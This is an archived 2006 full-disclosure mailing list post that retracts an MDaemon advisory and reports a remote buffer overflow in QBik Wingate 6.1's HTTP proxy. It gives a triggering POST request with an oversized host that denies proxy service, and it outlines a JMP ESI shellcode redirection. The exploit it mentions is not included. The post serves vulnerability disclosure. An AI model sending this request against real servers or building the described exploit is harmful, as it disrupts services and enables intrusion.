Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:13013
HistoryJun 07, 2006 - 12:00 a.m.

[Full-disclosure] MDaemon NOT vulnerable .. sorry for the advisory.. QBik Wingate is vulnerable

2006-06-0700:00:00
vulners.com
10

Hello this is kcope,
recently I thought I had discovered a remote preauth vulnerability in
MDaemon latest version (9.0.1/9.0.2).
And it really looked like one in the debugger (OllyDbg) … so I posted
it to full disclosure.
Afterwards I tried to write an exploit, and yes I succeeded! But the
problem is the "vulnerability" is only
exploitable inside the debugger for some weird reason. I guess it is not
exploitable under normal conditions
without a debugger attached. I guess the exception handler drops us to
another place when a debugger is
not attached. Because I am not in place to provide a working exploit for
this I am taking
back my advisory and please the vendor and you guys to forgive me about
that stupid posting, shit happens.
In future I will only release advisories with proven exploits :)

Ok lets go

QBik Wingate version 6.1.1.1077 Remote Buffer Overflow

WinGate 6.1 is a sophisticated integrated Internet gateway and
communications server
designed to meet the control, security and email needs of today's
Internet-connected businesses.

Description

The Wingate Product from QBik has a buffer overflow in the HTTP Proxy when
handling large hosts in a HTTP request.

This example will trigger an access violation due to the buffer overflow.
POST http://[AAAAAAA…A]/ HTTP/1.0\r\n\r\n

when a request like the one above is supplied wingate does not crash but
denies service on all proxy ports.

In my audit to exploit this vulnerability EIP is redirected to our own
location after
several exception handlers kicked in.
When EIP is redirected ESI holds our buffer including the shellcode.
So I chose a JMP esi in memory space for the EIP redirection and
successfully executed the shellcode.

Exploit for Windows 2000 is attached

    • kingcope